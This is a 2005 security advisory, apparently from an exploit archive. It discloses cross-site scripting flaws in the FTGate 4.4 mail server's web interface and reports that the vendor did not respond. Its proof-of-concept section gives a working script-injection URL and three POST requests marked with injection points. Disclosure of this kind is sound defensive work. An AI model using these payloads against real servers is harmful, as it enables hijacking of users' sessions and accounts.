what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ACSSEC-2005-11-25-3.txt

ACSSEC-2005-11-25-3.txt
Posted Dec 28, 2005
Authored by Tim Shelton

FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to specially crafted XSS requests. A remote attacker could trick a user into viewing a vulnerable page which could then lead to remote compromise.

tags | exploit, remote
SHA-256 | 33dfe89225193d68e6d1206225306097c653ed2c3a7fbe883ede8191c580112c

ACSSEC-2005-11-25-3.txt

Change Mirror Download

-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - XSS Scripting Vulnerability

ID: ACSSEC-2005-11-25 - 0x3

Class: Cross-Site-Scripting (XSS)
Package: FTGate 4.4 [Build 4.4.000 Oct 26 2005]
Build: Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 20, 2005

Remote: Yes
Severity: Low

Credit: Tim Shelton <security-advisories@acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-

-=[ Background

FTGate4 is a powerful Windows(TM) communication suite that combines
exceptional mail handling facilities with comprehensive Groupware
functionality. Its security and collaboration features were developed
in conjunction with leading ISP's and define a new era in mail server
performance.


-=[ Technical Description

FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to specially
crafted XSS requests. A remote attacker could trick a user into
viewing a vulnerable page which could then lead to remote compromise.


-=[ Proof of Concepts

http://127.0.0.1:8089/index.fts?href="><script>alert('XSS-magic-string');</s
cript>

POST /domains/index.fts
href=%2Fdomains%2Findex.fts&config=1003&command=0&start=0&param1=Domain+List
%2C%2Fdomains%2Findex.fts[STRING INJECTION
HERE]&param2=&find=*&elements=10&aliases=1&data0=19

POST /config/licence.fts
href=%2Fconfig%2Flicence.fts&config=1003&command=0&param1=Routing%2C%2Ffilte
rs%2Froutes.fts[STRING INJECTION HERE]&param2=&reg=

POST /config/systemacl.fts
href=%2Fconfig%2Fsystemacl.fts&config=1003&command=0&id=0&param1=System+Time
rs%2C%2Fschedules%2Findex.fts[STRING INJECTION
HERE]&redirect=&data1=32&address=

-=[ Solution
No remedy available as of December 2005.

-=[ Credits

Vulnerability originally reported by Tim Shelton


-=[ ChangeLog

2005-11-25 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-20 : No response from vendor, disclosing full information.
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close